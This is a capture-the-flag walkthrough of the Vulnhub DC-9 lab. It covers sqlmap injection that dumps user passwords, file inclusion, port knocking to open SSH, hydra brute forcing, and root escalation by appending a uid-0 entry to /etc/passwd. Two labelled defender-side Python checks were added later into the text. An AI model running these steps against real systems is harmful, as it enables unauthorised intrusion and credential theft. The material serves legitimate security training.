
【Vulnhub】DC-9

1. Host discovery

Using netdiscover, the target host was found at 192.168.203.135.

2. Port scanning

Using Nmap:

root@kali:~# nmap -sV -A 192.168.203.135 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-17 15:16 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.203.135
Host is up (0.00046s latency).
Not shown: 998 closed ports
PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.203.135
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.203.135:80/manage.php
|     Form id: 
|     Form action: manage.php
|     
|     Path: http://192.168.203.135:80/search.php
|     Form id: 
|_    Form action: results.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /css/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|_  /includes/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|_http-server-header: Apache/2.4.38 (Debian)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:apache:http_server:2.4.38: 
|     	CVE-2019-0211	7.2	https://vulners.com/cve/CVE-2019-0211
|     	CVE-2019-10082	6.4	https://vulners.com/cve/CVE-2019-10082
|     	CVE-2019-10097	6.0	https://vulners.com/cve/CVE-2019-10097
|     	CVE-2019-0217	6.0	https://vulners.com/cve/CVE-2019-0217
|     	CVE-2019-0215	6.0	https://vulners.com/cve/CVE-2019-0215
|     	CVE-2019-10098	5.8	https://vulners.com/cve/CVE-2019-10098
|     	CVE-2019-10081	5.0	https://vulners.com/cve/CVE-2019-10081
|     	CVE-2019-0220	5.0	https://vulners.com/cve/CVE-2019-0220
|     	CVE-2019-0196	5.0	https://vulners.com/cve/CVE-2019-0196
|     	CVE-2019-0197	4.9	https://vulners.com/cve/CVE-2019-0197
|_    	CVE-2019-10092	4.3	https://vulners.com/cve/CVE-2019-10092
MAC Address: 00:0C:29:23:B6:C5 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.46 ms 192.168.203.135

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.38 seconds

The target has port 80 open, and port 22 shows as filtered. Let's look at the web service:

3. Vulnerability discovery

Probe the search box for SQL injection.

There is indeed an injection. (The site appears to apply some filtering to the injection and also suppresses error messages.)

Use sqlmap to exploit it:

sqlmap -u "http://192.168.203.135/results.php" --data="search=123" --dbs

sqlmap -u "http://192.168.203.135/results.php" --data="search=123" -D Staff --tables

sqlmap -u "http://192.168.203.135/results.php" --data="search=123" -D Staff -T StaffDetails --columns

This looks like just staff detail records; check the other table:

sqlmap -u "http://192.168.203.135/results.php" --data="search=123" -D Staff -T Users --columns

sqlmap -u "http://192.168.203.135/results.php" --data="search=123" -D Staff -T Users -C UserID,Username,Password --dump

This gives the admin password: transorbital1.

4. Getting a shell

We use it to log in to the website.

There is an interesting spot here: "File does not exist".

This looks like a local file inclusion:

Sure enough, there is a local file inclusion.

The original plan was to write a one-line webshell into the Apache log file to get a shell, but the box author seems to have moved the log files elsewhere.

So I borrowed an idea from this writeup: https://blog.csdn.net/adminuil/article/details/104055711

/etc/knockd.conf

knockd is a port-knock server. It listens to all traffic on an Ethernet (or other available) interface, waiting for a special sequence of port hits. Client software such as telnet or PuTTY initiates a port hit by sending TCP (or UDP) packets to ports on the server.

Original text here: https://www.sohu.com/a/239577838_185201

So the target has indeed been tampered with, which is why our scan showed port 22 as filtered.

Now we need to hit the three ports 7469, 8475 and 9842 in order, and the SSH port will open.

Now we can see that port 22 is open.

Right now we only have the admin account, but judging from the /etc/passwd obtained through the file inclusion there seems to be no admin user, so admin isn't the way in; it looks more like those users are, so I ran the database injection once more:
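Added here as a defender-side detector, not part of the original writeup: it parses iptables LOG lines and reports any source that hits 7469, 8475 and 9842 in order, so a knock that opens sshd leaves an alert rather than passing silently. The log prefix, both source addresses and the 10 s window are assumptions; the post does not quote the seq_timeout line of knockd.conf.

```python
import re
from datetime import datetime

# Sequence from the /etc/knockd.conf read via the LFI; the 10 s window is assumed.
KNOCK_SEQUENCE = (7469, 8475, 9842)
SEQ_TIMEOUT_S = 10

# Constructed iptables LOG lines: .130 knocks correctly, .140 is too slow (made up).
SAMPLE_LOG = """\
Feb 17 16:02:10 dc-9 kernel: FW-DROP: IN=eth0 OUT= SRC=192.168.203.130 DST=192.168.203.135 PROTO=TCP SPT=40001 DPT=7469 SYN URGP=0
Feb 17 16:02:11 dc-9 kernel: FW-DROP: IN=eth0 OUT= SRC=192.168.203.130 DST=192.168.203.135 PROTO=TCP SPT=40002 DPT=8475 SYN URGP=0
Feb 17 16:02:12 dc-9 kernel: FW-DROP: IN=eth0 OUT= SRC=192.168.203.130 DST=192.168.203.135 PROTO=TCP SPT=40003 DPT=9842 SYN URGP=0
Feb 17 16:05:00 dc-9 kernel: FW-DROP: IN=eth0 OUT= SRC=192.168.203.140 DST=192.168.203.135 PROTO=TCP SPT=50001 DPT=7469 SYN URGP=0
Feb 17 16:05:30 dc-9 kernel: FW-DROP: IN=eth0 OUT= SRC=192.168.203.140 DST=192.168.203.135 PROTO=TCP SPT=50002 DPT=8475 SYN URGP=0
Feb 17 16:05:31 dc-9 kernel: FW-DROP: IN=eth0 OUT= SRC=192.168.203.140 DST=192.168.203.135 PROTO=TCP SPT=50003 DPT=9842 SYN URGP=0
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) .*?SRC=(?P<src>[\d.]+) "
    r".*?PROTO=TCP .*?DPT=(?P<dpt>\d+) .*?\bSYN\b"
)

def find_knock_sequences(log_text, sequence=KNOCK_SEQUENCE, timeout=SEQ_TIMEOUT_S):
    """(src, timestamp) for each source completing the sequence within `timeout`."""
    state = {}   # src -> (index of next expected knock, time of first knock)
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue   # not a TCP SYN log line
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
        src, dpt = m["src"], int(m["dpt"])
        if dpt not in sequence:
            continue   # unrelated port: scan noise, not a knock stage
        idx, started = state.get(src, (0, ts))
        if idx and (ts - started).total_seconds() > timeout:
            idx = 0    # window expired: the attempt in progress is void
        if dpt == sequence[idx]:
            idx += 1
            if idx == len(sequence):
                alerts.append((src, m["ts"]))
                state.pop(src, None)
            else:
                state[src] = (idx, ts if idx == 1 else started)
        elif dpt == sequence[0]:
            state[src] = (1, ts)   # out-of-order hit that is itself a first knock
        else:
            state.pop(src, None)   # wrong port for this stage: attempt discarded
    return alerts
```

Feed it the kernel log of a host running knockd behind an iptables LOG rule; with the real seq_timeout passed as `timeout`, every completed sequence (and nothing slower) is reported.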

sqlmap -u "http://192.168.203.135/results.php" --data="search=123" -D users -T UserDetails --dump

Result:

Database: users
Table: UserDetails
[17 entries]
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname   | password      | reg_date            | username  | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1  | Moe        | 3kfs86sfd     | 2019-12-29 16:58:26 | marym     | Mary      |
| 2  | Dooley     | 468sfdfsd2    | 2019-12-29 16:58:26 | julied    | Julie     |
| 3  | Flintstone | 4sfd87sfd1    | 2019-12-29 16:58:26 | fredf     | Fred      |
| 4  | Rubble     | RocksOff      | 2019-12-29 16:58:26 | barneyr   | Barney    |
| 5  | Cat        | TC&TheBoyz    | 2019-12-29 16:58:26 | tomc      | Tom       |
| 6  | Mouse      | B8m#48sd      | 2019-12-29 16:58:26 | jerrym    | Jerry     |
| 7  | Flintstone | Pebbles       | 2019-12-29 16:58:26 | wilmaf    | Wilma     |
| 8  | Rubble     | BamBam01      | 2019-12-29 16:58:26 | bettyr    | Betty     |
| 9  | Bing       | UrAG0D!       | 2019-12-29 16:58:26 | chandlerb | Chandler  |
| 10 | Tribbiani  | Passw0rd      | 2019-12-29 16:58:26 | joeyt     | Joey      |
| 11 | Green      | yN72#dsd      | 2019-12-29 16:58:26 | rachelg   | Rachel    |
| 12 | Geller     | ILoveRachel   | 2019-12-29 16:58:26 | rossg     | Ross      |
| 13 | Geller     | 3248dsds7s    | 2019-12-29 16:58:26 | monicag   | Monica    |
| 14 | Buffay     | smellycats    | 2019-12-29 16:58:26 | phoebeb   | Phoebe    |
| 15 | McScoots   | YR3BVxxxw87   | 2019-12-29 16:58:26 | scoots    | Scooter   |
| 16 | Trump      | Ilovepeepee   | 2019-12-29 16:58:26 | janitor   | Donald    |
| 17 | Morrison   | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2  | Scott     |
+----+------------+---------------+---------------------+-----------+-----------+

Next, brute-force with the usernames and passwords obtained, using hydra:

root@kali:~# hydra -L username.txt -P password.txt 192.168.203.135 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-02-17 17:18:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 306 login tries (l:17/p:18), ~20 tries per task
[DATA] attacking ssh://192.168.203.135:22/
[22][ssh] host: 192.168.203.135   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.203.135   login: janitor   password: Ilovepeepee
[22][ssh] host: 192.168.203.135   login: joeyt   password: Passw0rd
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-02-17 17:19:52

We got three username/password pairs. Logging in with each in turn, we eventually found a hidden file in user janitor's home directory.

It looks like passwords for other users, so we brute-force again with these passwords:

[22][ssh] host: 192.168.203.135   login: fredf   password: B4-Tru3-001
[22][ssh] host: 192.168.203.135   login: joeyt   password: Passw0rd

5. Privilege escalation

Log in as user fredf.

We find that /opt/devstuff/dist/test/test can be executed with sudo without the root password.

test is an executable; let's look through the directory for other clues.

We found its source code. From the usage, it can roughly be understood as:

read the contents of the file given as the first argument, then write those contents into the file given as the second argument.

So we can create a user entry with a password and write it into /etc/passwd.

perl -le 'print crypt("hackergu","salt")' generates the salted password hash.

Create a user entry:

echo 'admin:saBGghOLaw5vg:0:0::/root:/bin/bash' >> /tmp/passwd

Write it into /etc/passwd:

fredf@dc-9:/opt/devstuff/dist/test$ echo 'admin:saBGghOLaw5vg:0:0::/root:/bin/bash' >> /tmp/passwd
fredf@dc-9:/opt/devstuff/dist/test$ sudo ./test /tmp/passwd /etc/passwd
fredf@dc-9:/opt/devstuff/dist/test$ su admin
Password: 
root@dc-9:/opt/devstuff/dist/test# cd /root
root@dc-9:~# ls
theflag.txt
root@dc-9:~# cat theflag.txt


███╗   ██╗██╗ ██████╗███████╗    ██╗    ██╗ ██████╗ ██████╗ ██╗  ██╗██╗██╗██╗
████╗  ██║██║██╔════╝██╔════╝    ██║    ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║     █████╗      ██║ █╗ ██║██║   ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║     ██╔══╝      ██║███╗██║██║   ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
██║ ╚████║██║╚██████╗███████╗    ╚███╔███╔╝╚██████╔╝██║  ██║██║  ██╗██╗██╗██╗
╚═╝  ╚═══╝╚═╝ ╚═════╝╚══════╝     ╚══╝╚══╝  ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝╚═╝╚═╝╚═╝
                                                                             
Congratulations - you have done well to get to this point.

Hope you enjoyed DC-9.  Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges.

I also want to send out a big thank you to the various members of @m0tl3ycr3w .

They are an inspirational bunch of fellows.

Sure, they might smell a bit, but...just kidding.  :-)

Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series.

So long, and thanks for all the fish.
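Added here as a defender-side check, not part of the original writeup: a small audit over /etc/passwd that flags exactly the artefacts of the step above (a second uid 0 entry, a hash kept inline in passwd instead of shadow, a non-root account homed in /root), plus the malformed and passwordless cases such a file can also contain. The sample file contents, uids and GECOS values are constructed.

```python
# Constructed /etc/passwd excerpt: a normal Debian-style head plus the entry the
# writeup appended (uids and GECOS fields here are made up).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
fredf:x:1003:1003:Fred Flintstone,,,:/home/fredf:/bin/bash
janitor:x:1016:1016:,,,:/home/janitor:/bin/bash
admin:saBGghOLaw5vg:0:0::/root:/bin/bash
"""

# Password-field values that defer to /etc/shadow or lock the account outright.
NO_INLINE_HASH = {"x", "*", "!", "!!"}

def audit_passwd(text):
    """Return (username, finding) pairs for entries that look planted or tampered."""
    findings, seen = [], {}
    for lineno, line in enumerate(text.splitlines(), 1):
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((f"line {lineno}", "malformed entry, expected 7 fields"))
            continue
        name, pw, uid, _gid, _gecos, home, _shell = fields
        if not uid.isdigit():
            findings.append((name, f"non-numeric uid {uid!r}"))
            continue
        if name in seen:
            findings.append((name, f"duplicate username, first seen on line {seen[name]}"))
        seen.setdefault(name, lineno)
        if uid == "0" and name != "root":
            findings.append((name, "uid 0 account other than root"))
        if pw == "":
            findings.append((name, "empty password field, logs in without a password"))
        elif pw not in NO_INLINE_HASH:
            findings.append((name, "password hash kept in world-readable /etc/passwd"))
        if home == "/root" and name != "root":
            findings.append((name, "home directory is /root"))
    return findings
```

Run it over the real file (`audit_passwd(open("/etc/passwd").read())`) from a cron job or a host-integrity check; on a clean Debian install it returns an empty list.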
